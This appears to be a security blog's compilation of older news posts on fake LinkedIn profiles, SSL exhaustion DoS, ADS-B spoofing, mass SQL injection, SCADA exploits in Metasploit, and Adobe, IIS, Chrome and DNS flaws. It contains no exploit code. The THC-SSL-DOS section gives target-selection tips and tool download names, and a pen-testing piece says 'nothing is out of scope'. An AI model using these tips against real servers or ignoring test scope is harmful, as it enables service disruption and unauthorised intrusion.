How to Spot a Fake LinkedIn Profile

Scams on Linkedin Exposed. How gullible job-seekers are beguiled!


LinkedIn is no stranger to fraud, having recently survived a heavily scrutinized password breach.


Unfortunately, it's largely up to you to protect yourself from falling into the snare of a scam artist posing as a legitimate professional connection. Understand that once you are linked with a fraudsters there is no telling what type of scams they will try to pull on you.


They may also victimize your other connections if you allow your linked connections to see one another (you can change your settings to prevent this). Because some LinkedIn users are in the practice of accepting all invitations, it's incredibly important to look out for scammers.


John Thomas of Bloglerati has put together an excellent collection of fake profiles on his Facebook page, along with the following red flags for spotting fake LinkedIn profiles:

• Lower case first and last name
• Stock photo for profile picture
• Minimal info in profile
• Belongs to a large number of groups
• Generic company name
• Rhythmic names, like Sam Smith or Joe Johnson

Now you can DDOS SSL?

SSL DDOS tool released in to the wild with download

THC-SSL-DOS is a tool to verify the performance of SSL.Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today.

The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature Comparing flood DDoS vs. SSL-Exhaustion attack. A traditional flood DDoS attack cannot be mounted from a single DSL connection.

This is because:

• The bandwidth of a server is far superior to the bandwidth of a DSL connection
• A DSL connection is not an equal opponent to challenge the bandwidth of a server
• This is turned upside down for THC-SSL-DOS
• The processing capacity for SSL handshakes is far superior at the client side
• A laptop on a DSL connection can challenge a server on a 30Gbit link

Traditional DDoS attacks based on flooding are sub optimal. Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack. The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are not prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats

1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port).

Counter measurements: No real solutions exists. The following steps can mitigate (but not solve) the problem:

1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this.

Download SSL DDOS Tool:

Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source : thc-ssl-dos-1.4.tar.gz
Source:http://www.thc.org/thc-ssl-dos/

Air traffic system vulnerable to cyber attack

Next-generation global air traffic control system is vulnerable to malicious hacks that could cause catastrophe

An alarm blares in the cockpit mid flight, warning the pilot of an imminent collision. The pilot checks his tracking display, sees an incoming aircraft and sends the plane into a dive. That only takes it into another crowded air lane, however, where it collides with a different plane. Investigators later discover that the pilot was running from a "ghost" - a phantom aircraft created by a hacker intent on wreaking havoc in the skies.

It's a fictional scenario, but US air force analysts warn that it could be played out if hackers exploit security holes in an increasingly common air traffic control technology.

At issue is a technology called Automatic Dependent Surveillance - Broadcast (ADS-B), which the International Civil Aviation Organisation certified for use in 2002. Gradually being deployed worldwide, ADS-B improves upon the radar-based systems that air traffic controllers and pilots rely on to find out the location and velocity of aircraft in their vicinity.

Conventional ground-based radar systems are expensive to run, become less accurate at determining position the further away a plane is, and are slow to calculate an aircraft's speed. Perhaps worst of all, their limited range means they cannot track planes over the ocean.

So instead of bouncing radar signals off aircraft, ADS-B uses GPS signals to continuously broadcast a plane's identity, ground position, altitude and velocity to networks of ground stations and other nearby aircraft. This way, everyone knows where everyone else is.

ADS-B transmits information in unencrypted 112-bit bursts - a measure intended to make the system simple and cheap to implement. It's this that researchers from the US air force's Institute of Technology at Wright-Patterson Air Force Base in Ohio are unhappy with. Donald McCallie, Jonathan Butts and Robert Mills warn that the unencrypted signals could be intercepted and spoofed by hackers, or simply jammed.

The team says the vulnerabilities it has identified "could have disastrous consequences including confusion, aircraft groundings, even plane crashes if exploited by adversaries" (International Journal of Critical Infrastructure Protection, DOI: 10.1016/j.ijcip.2011.06.001).

Massive SQL injection attack

Mass Injection hits over 694,000 URLs

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language.

The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and passing this input directly into the database. If the input is malformed in a particular way, the result is that the database will run code of the attacker's choosing. In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically "http://lizamoon.com/ur.php" or more recently, "http://alisa-carter.com/ur.php." Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing. The injected code is also found on a number of product pages on Apple's iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple's system.

However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified. SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands.

In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia. It's been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Windows UAC Malware Threat

The exploit allows an attacker to impersonate the system account

A new zero-day attack against Windows, capable of bypassing the User Access Control (UAC) protections introduced in Windows Vista and designed to prevent malware from gaining administrative access without user authorisation, has been discovered in the wild.

The proof-of-concept implementation of the infection technique, known as Troj/EUDPoC-A, was posted to a Chinese educational forum before being discovered by anti-virus researchers from various security firms.

Chester Weisniewski, of anti-virus vendor Sophos, warns that the technique used by the Trojan enables an attacker to impersonate the system account, which has nearly unlimited access to all components of the Windows system, and does so without triggering the User Access Control protections introduced by Microsoft to prevent exactly that occurring. The flaw currently exists in all versions of Windows.

Pls ensure your system is up to date with latest patches and your anti-virus with latest virus definitions.

Pen-Testing: Learn your target, Understand your target, Develop your attack specifically around your target

Would it cripple the organization as a whole? What hurts them the most?

Since when did a penetration test primarily become automated tool driven? Scanners are an aid but not a full supplemental for us as penetration testers.

Handing a sixty page 'penetration test' report with five hundred vulnerabilities does absolutely nothing for a company aside from a check mark for whatever regulatory and compliance initiatives they have underway. It's time for a reality check:

• Good hackers don't need to utilize expensive vulnerability scanners.
  
  
• Good hackers don't use automated penetration testing.
  
  
• Attackers don't have a scope or timeframes.
  
  
• Attackers don't stop after they get root.
  
  
• Attackers don't have portions taken out of scope.

The reality of the current situation with pentests is that the true purpose of a testing is completely wasted. For one, your incident response team doesn't get a true attack against a focused attack. If you are at the point where you can't detect automated scans against your network then these traditional methods are right up your alley and your security program is still immature in nature which is fine, you'll get there. The most important element is there is no true representation of impact or financial loss due to a breach.

In simplistic terms there's no focus on business risk, but instead focused on the vulnerability and the exposure of the attack. We aren't hitting companies where it hurts, what makes their business run.

Penetration testing has to be something that measures the organizations business risk and impact if a breach were to occur. When attacking an organization you have to understand what is sensitive and what hurts the company the most. Intelligence gathering is one of the most important elements of a penetration test as well as understanding and learning the network.

Learn your target, understand your target, develop your attack specifically around your target, nothing is out of scope.

Where can I have the most impact on the organization and how do I represent that? WOW I GOT DOMAIN ADMIN!!!!!! OMG I GOT ROOT! That's fantastic buddy, I'm happy for you but that doesn't mean squat to me. Present them with their intellectual property, future projections, show the ability to change their product, confidential and trade secret information or whatever you identify as what hurts them the most. Some questions to answer in Pen-testing includes but not limited to: would that impact them in a negative manner? Would it cripple the organization as a whole? What hurts them the most?

We're also significantly challenged with the basic penetration tests, how do you go against a cheap vulnerability scan penetration test to something that will cost significantly more than that and be done right. Businesses don't understand the difference, they just go with the cheapest buyer, they don't know what they are about to purchase sucks.

We need to hire qualified people that get it, I will pay extra for a group that knows what they are doing vs. a super cheap scan. The industry is bleeding, let's step it up and do it the right way.

SCADA security issues will be the shiny hot topic

Metasploit and SCADA Exploits: Dawn of a New Era?

On 18 October, 2010 a significant event occurred concerning threats to SCADA.

That event is the addition of a zero-day exploit for the RealFlex RealWin SCADA software product into the Metasploit repository.

Some striking facts about this event follow:

1. This was a zero-day vulnerability that unfortunately was not reported publicly, to a organization like ICS-CERT or CERT/CC, or (afaik) to the RealFlex vendor.
   
   
2. This exploit was not added to the public Exploit-DB site until 27 October, 2011.
   
   
3. The existence of this exploit was not acknowledged with a ICS-CERT advisory until 1 November, 2010.
   
   
4. This is the first SCADA exploit added to Metasploit.

Shawn Medinger at InfoSec Island shared some interesting thoughts:

First, the SCADA community can expect to see an explosion of vulnerabilities and accompanying exploits against SCADA devices in the near future.

Second, the diverse information sources that SCADA vulnerabilities may appear must be vigilantly monitored by numerous organizations and security researchers.

Afaik, the first widely-disseminated information on the RealFlex RealWinbuffer overflow occurred on 1 November, when I sent the information to the SCADASEC mailing list.

Third, people should recognize that the recent Stuxnet threat has cast a light on SCADA security issues. Put bluntly, there is blood in the water.

Quite a few people, companies and other organizations are currently investigating SCADA product security, buying equipment and conducting security testing for a number of differing interests and objectives.

Fourth, understand that because of the current broken business model, security researchers are often frustrated by software vendors’ action, or inaction, when it comes to reporting vulnerabilities.

Often, there is no security point-of-contact at the vendor. Even worse, the technical support who are contacted by the security researcher often do not understand the technical and security implications of the issue reported.

Even in the case of specialty SCADA security shops reporting vulnerabilites to the vendor, we are seeing documented cases of “vendor spin” furthering the bad blood between vendors and ethical research.

All of these factors lead to frustrated security researchers, some of whom will simply expose the vulnerability and exploit to the world, rather than take a disclosure path through a CERT.

Fifth, folks should recognize that attack frameworks like Metasploit enable a never-before-seen level of integration of these kinds of targeted critical infrastructure-relate exploits into a powerful tool.

Advanced evasion techniques can bypass network security

After "APT", we now have "AET"

A new hacking technique creates a mechanism for hackers to smuggle attacks past security defences, such as firewalls and intrusion prevention systems.

So-called advanced evasion techniques (AET) are capable of bypassing network security defences, according to net appliance security firm Stonesoft, which was the first to document the approach. Researchers at the Finnish firm came across the attack while testing its security appliance against the latest hacker exploits.

Various evasion techniques including splicing and fragmentation have existed for years. Security devices have to normalise traffic using these approaches before they can inspect payloads and block attacks.

Refer here to read more details.

New security flaw exploited on Adobe Reader and Acrobat

New security flaw exploited on Adobe Reader and Acrobat

Adobe has warned this week that a new security flaw in Reader and Acrobat is now being exploited, allowing for hackers to take over victim's systems. The company says the vulnerability can "cause a crash and potentially allow an attacker to take control of the affected system."

Affected softwares are Adobe Reader 9.3.4 and earlier for Windows and Mac, and Acrobat versions 9.3.4 and earlier for both operating systems. While Adobe would not give technical details on the flaw, security firm Secunia said it was caused by a "boundary error within the font parsing in CoolType.dll and can be exploited to cause a stack-based buffer overflow by ...tricking a user into opening a specially crafted PDF file."

IBM X-Force Mid-Year Trend and Risk Report

2010 Mid-year highlights

The IBM X-Force 2010 Mid-Year Trend and Risk Report reveals several key trends that demonstrate how, in the first half of 2010, attackers seeking to steal money or personal data increasingly targeted their victims via the Internet. The IBM X-Force Trend and Risk Report is produced twice per year: once at mid-year and once at year-end. This report provides statistical information about all aspects of threats that affect Internet security, including software vulnerabilities and public exploitation, malware, spam, phishing, web-based threats, and general cyber criminal activity.

Summary

Attackers are increasingly using covert techniques like Javascript obfuscation and other covert techniques which continue to frustrate IT security professionals. Obfuscation is a technique used by software developers and attackers alike to hide or mask the code used to develop their applications.

Reported vulnerabilities are at an all time high, up 36%. 2010 has seen a significant increase in volume of security vulnerability disclosures, due both to significant increases in public exploit releases and to positive efforts by several large software companies to identify and mitigate security vulnerabilities.

PDF attacks continue to increase as attackers trick users in new ways. To understand why PDFs are targeted, consider that endpoints are typically the weakest link in an enterprise organization. Attackers understand this fact well. For example, although sensitive data may not be present on a particular endpoint, that endpoint may have access to others that do. Or, that endpoint can be used as a practical bounce point to launch attacks on other computers.

The Zeus botnet toolkit continues to wreak havoc on organizations. Early 2010 saw the release of an updated version of the Zeus botnet kit, dubbed Zeus 2.0. Major new features included in this version provide updated functionality to attackers.

Vulnerabilities and exploitation highlights

=> Advanced persistent threat—What concerns X-Force most about these sophisticated attackers is their ability to successfully penetrate well defended networks in spite of significant advances in network security technology and practices. In particular, we are concerned about increasingly obfuscated exploits and covert malware command-and-control channels that fly under the radar of modern security systems.

=> Obfuscation, obfuscation, obfuscation—Attackers continue to find new ways to disguise their malicious traffic via JavaScript and PDF obfuscation. Obfuscation is a technique used by software developers and attackers alike to hide or mask the code used to develop their applications. Things would be easier if network security products could simply block any JavaScript that was obfuscated,but unfortunately, obfuscation techniques are used by many legitimate websites in an attempt to prevent unsophisticated Web developers from stealing their code. These legitimate websites act as cover for the malicious ones, turning the attacks into needles in a haystack.

=> PDF attacks continue to increase as attackers trick users in new ways. To understand why PDFs are targeted, consider that endpoints are typically the weakest link in an enterprise organization. Attackers understand this fact well. For example, although sensitive data may not be present on a particular endpoint, that endpoint may have access to others that do. Or, that endpoint can be used as a practical bounce point to launch attacks on other computers.

=> Reported vulnerabilities are at an all time high—2010 has seen a significant increase in the volume of security vulnerability disclosures, due both to significant increases in public exploit releases and to positive efforts by several large software companies to identify and mitigate security vulnerabilities.

=> Web application vulnerabilities have inched up to the 55 percent mark, accounting for fully half of all vulnerability disclosures in the first part of 2010.

=> Exploit Effort versus Potential Reward—What are attackers really going after? With the number of vulnerability announcements rising and vendors scrambling to provide patches and protection to problem areas, how can enterprises best prioritize the efforts of IT administrators to provide adequate coverage? The Exploit Effort versus Potential Reward Matrix provides a simple model for thinking about vulnerability triage from the perspective of attackers.

Please refer here to download or view the report.

Fully patched iPhone Hacked

Using all new ARM exploit - Entire SMS database hijacked

A pair of European researchers used the spotlight of the CanSecWest Pwn2Own hacking contest here to break into a fully patched iPhone and hijack the entire SMS database, including text messages that had already been deleted.

Using an exploit against a previously unknown vulnerability, the duo — Vincenzo Iozzo and Ralf Philipp Weinmann — lured the target iPhone to a rigged Web site and exfiltrated the SMS database in about 20 seconds. The exploit crashed the iPhone’s browser session but Weinmann said that, with some additional effort, he could have a successful attack with the browser running.

“Basically, every page that the user visits on our [rigged] site will grab the SMS database and upload it to a server we control,” Weinmann explained. Iozzo, who had flight problems, was not on hand to enjoy the glory of being the first to hijack an iPhone at the Pwn2Own challenge.

Please refer here to read more details.

Hackers exploit FTP flaw in Microsoft's IIS

Sites running the FTP service on Microsoft's Internet Information Services (IIS) Web software may be vulnerable to attacks.

Microsoft says FTP service versions 5 and 6 are affected, but claims version 7.5 is unaffected on Vista and Windows Server 2008.

Webmasters take note: if you use Microsoft's FTP service, attackers could plant code on your servers or launch a denial-of-service (DoS) attack against your site.According to Microsoft, a newly discovered set of FTP flaws allows an attacker to install unauthorized software on an Internet Information Services (IIS) server or to crash the box.The vulnerable versions of the FTP service shipped on several flavors of Windows and Windows Server over the years.

Microsoft says the latest version of the FTP service, 7.5, is safe on Vista and Windows Server 2008.The remote-execution vulnerability, which was first described on the Milw0rm security site on Aug. 31, could allow an attacker to run malicious code. Modern versions of Windows have a feature called /GS (a buffer security check) that protects them from remote-code execution, but earlier versions do not.The newly announced vulnerabilities include a buffer-overflow flaw, which could lead to a DoS attack against any of the affected versions of Windows.

Buffer-overflow attacks use an anonymous account that has both read and write permissions. The threat, however, isn't limited only to anonymous users.

Microsoft has updated security advisory 975191 to discuss all the known unpatched FTP exploits in IIS.

Multiple Adobe security holes closed

A regular patching cycle isn’t enough for Adobe, as multiple flaws need closing in some of its popular software products.

Adobe has released an out-of-cycle patch for its Flash Player, AIR, Reader and Acrobat software, closing more than 10 vulnerabilities that potentially left users open to attack.

It closes a recent vulnerability in Flash that was highlighted by Symantec and actively exploited in the wild. It also fixes 11 other flaws, including three that fixed problems in vulnerable Microsoft code (its Active Template Library (ATL)).

All of the fixed vulnerabilities were critical, with most having the potential to allow an attacker to take over a user’s system. Details of how to update the Adobe software can be found in its security bulletin here. Adobe is planning its next regular quarterly security update for Adobe Reader and Acrobat on 13 October.

Adobe has had a very difficult time this year, with its popular Reader and Acrobat products suffering so many problems that a Microsoft ‘Patch Tuesday’ style security update cycle has become necessary.

Cyber criminals see PDF-reading software as a good oppportunity to compromise computer systems as well as to install malware.

Conflicker Worm - Microsoft's fault or not?

AutoRun patch a long time coming for XP users

Nearly 18 months after it was discovered, Microsoft has finally fixed a hole in the AutoRun function of older Windows versions that allowed viruses to spread via external storage devices.

While it's good to know Microsoft is finally listening to the complaints of the Windows community, the company's delay in applying important patches put our systems at risk unnecessarily.

The more noise customers make, the more likely the problems will be rectified. Most recently, the Conficker worm has been spreading across networks, often entering systems via USB flash drives and other removable media. Shamefully, Microsoft could have — and should have — prevented this massive infection from happening in the first place.

In October 2007, Nick Brown documented in his blog how viruses and worms were entering his network via USB memory sticks. Fast-forward to one year ago. Will Dormann and US-CERT (the United States Computer Emergency Readiness Team) published information on Mar. 20, 2008, confirming that Microsoft's AutoRun advice didn't block threats.

In July 2008, Microsoft released security bulletin MS08-038. The patch in this bulletin made it possible for users to control AutoRun properly, but only on Windows Vista and Server 2008.

So what happened to the equivalent patch for Windows 2000, XP, and Server 2003? In May 2008, Microsoft had in fact released a patch for these systems, which is described in Knowledge Base article 953252. However, as described in a Jan. 22, 2009, Computerworld article, US-CERT found that the fix for XP/2000/2003 had to be applied manually. Furthermore, Microsoft was not making the patch available automatically via any Windows Update service.

It wasn't until Feb. 24 of this year that Microsoft distributed this patch via Windows Update to XP, 2000, and 2003. This is described in the company's security advisory 967940.

Many home and business PC users rarely deploy patches that aren't available through Windows Update, Microsoft Update, or WSUS (Windows Software Update Services). Add to this the confusing and conflicting information about the AutoRun patch, and it's no wonder the Conficker worm, which exploits AutoRun functionality, made the inroads that it did.

You may be wondering why it took Microsoft so long to distribute for XP/2000/2003 users the fix that permits AutoRun to be properly disabled. One clue may be found in the file versions listed in KB article 967715. The Windows Server 2003 files are dated Feb. 10, 2009. Typically, Microsoft doesn't release a fix for one platform if it's still developing a fix for another platform. This is done to avoid putting one set of customers at risk while protecting others.

That's usually a valid reason to wait before distributing patches. But when you open up the files described in the earlier KB article 953252, you find that all the files in that hotfix date back to mid-2008.

Why did it take an admonition from CERT to convince Microsoft to add this vital fix to Automatic Updates for those versions of Windows? To make things even more confusing, the way Microsoft released the XP/2000/2003 fix at the end of February caused many people to think it was an out-of-cycle security patch.

For home users, I'm not yet ready to pull the fire alarm and tell everyone to disable AutoRun. But I do urge you to be very leery of plugging USB flash drives into your system if you're unsure whether they've been used on other computers. Large organizations, however, should consider disabling AutoRun on their networked PCs, considering how hard it's been to stomp out the Conficker worm and others.

So do you think if this patch had been pushed to all Windows users sooner, much of Conficker's pain might have been avoided?

SCADA Attack code released

Threat to computers for industrial systems now serious

A security researcher has published code that could be used to take control of computers used to manage industrial machinery, potentially giving hackers a back door into utility companies, water plants, and even oil and gas refineries.

The software was published late Friday night by Kevin Finisterre, a researcher who said he wants to raise awareness of the vulnerabilities in these systems, problems that he said are often downplayed by software vendors. "These vendors are not being held responsible for the software that they're producing," said Finisterre, who is head of research with security testing firm Netragard. "They're telling their customers that there is no problem, meanwhile this software is running critical infrastructure."

Finisterre released his attack code as a software module for Metasploit, a widely used hacking tool. By integrating it with Metasploit, Finisterre has made his code much easier to use, security experts said. "Integrating the exploit with Metasploit gives a broad spectrum of people access to the attack," said Seth Bromberger, manager of information security at PG&E. "Now all it takes is downloading Metasploit and you can launch the attack."

The code exploits a flaw in Citect's CitectSCADA software that was originally discovered by Core Security Technologies and made public in June. Citect released a patch for the bug when it was first disclosed, and the software vendor has said that the issue poses a risk only to companies that connect their systems directly to the Internet without firewall protection, something that would never be done intentionally. A victim would have to also enable a particular database feature within the CitectSCADA product for the attack to work.

These types of industrial SCADA (supervisory control and data acquisition) process control products have traditionally been hard to obtain and analyze, making it difficult for hackers to probe them for security bugs, but in recent years more and more SCADA systems have been built on top of well-known operating systems like Windows or Linux making them both cheaper and easier to hack.

IT security experts are used to patching systems quickly and often, but industrial computer systems are not like PCs. Because a downtime with a water plant or power system can lead to catastrophe, engineers can be reluctant to make software changes or even bring the computers off-line for patching.

This difference has led to disagreements between IT professionals like Finisterre, who see security vulnerabilities being downplayed, and industry engineers charged with keeping these systems running. "We're having a little bit of a culture clash going on right now between the process control engineers and the IT folks," said Bob Radvanovsky, an independent researcher who runs a SCADA security online discussion list that has seen some heated discussions on this topic.

Citect said that it had not heard of any customers who had been hacked because of this flaw. But the company is planning to soon release a new version of CitectSCADA with new security features, in a statement (PDF), released Tuesday.

That release will come none too soon, as Finisterre believes that there are other, similar, coding mistakes in the CitectSCADA software.

And while SCADA systems may be separated from other computer networks within plants, they can still be breached. For example, in early 2003, a contractor reportedly infected the Davis-Besse nuclear power plant with the SQL Slammer worm.

"A lot of the people who run these systems feel that they're not bound by the same rules as traditional IT," Finisterre said. "Their industry is not very familiar with hacking and hackers in general."

Google issues first patches for Chrome

They're aimed at multiple security vulnerabilities; browser updates automatically

Just days after it rolled out Chrome, Google Inc. issued an update after Vietnamese security researchers reported a critical vulnerability in the beta browser.

According to Le Duc Anh, a researcher at Bach Khoa Internetwork Security (BKIS), which is housed at the Hanoi University of Technology, the Chrome beta posted last week contained a buffer overflow bug that could be used by attackers to hijack PCs.

The flaw can be triggered when the user saves a Web page -- using Chrome's "Save page as" command -- with a very long name. That, in turn, creates a stack-based buffer overflow that hackers can leverage to introduce additional malicious code.

"To exploit the vulnerability, a hacker might construct a specially-crafted Web page, which contains malicious code," said a security advisory issued by BKIS on Friday. "[The hacker would] then trick users into visiting his site and convince them to save this page. Right after that, the code would be executed, giving him the privilege to make use of the affected system."

Chrome 0.2.149.27 is affected by the vulnerability. BKIS maintained that, of several Chrome bugs reported last week, this is the only one that could be used to compromise a computer.

Google patched the vulnerability Sunday and released an updated beta, Version 0.2.149.29, the same day. "We've released an update to Google Chrome that fixes many of the issues reported here," said someone identified only as "Simon" in a Chrome support forum yesterday.

Refer here for another flaw in Google Chrome on Roger's Blog.

DNS Attack Code Exploit

Metasploit Loads Up DNS Attack Code

Script kiddies and sophisticated hackers gained easy access to code for exploiting a critical flaw in the domain name service (DNS) system when the Metasploit Project added two attacks to its toolkit.

Back on July 9th, an advisory to major vendors of DNS systems advised them to patch their products with all due haste. Security pros with unpatched DNS systems under their purview reading this today need to get this done fast.

The Metasploit Project updated its framework to include code aimed at testing DNS for vulnerability to exploitation. A successful attack against DNS using the method discovered by Dan Kaminsky and confirmed by Halvar Flake would result in requests to a compromised nameserver being silently directed to a different website.

Threat Level learned from Metasploit maintainer and noteworthy security researcher HD Moore about the updates to the testing tool with this code. The two exploits make it "much more effective for wide-scale hijacking," according to Moore.

Much of the threat may have been mitigated already, due to work by Kaminsky and Paul Vixie in coordinating a global response with major vendors of affected products. It won't mean much if admins of vulnerable systems do not apply the patches; one hopes any stragglers will perk up today and get this done.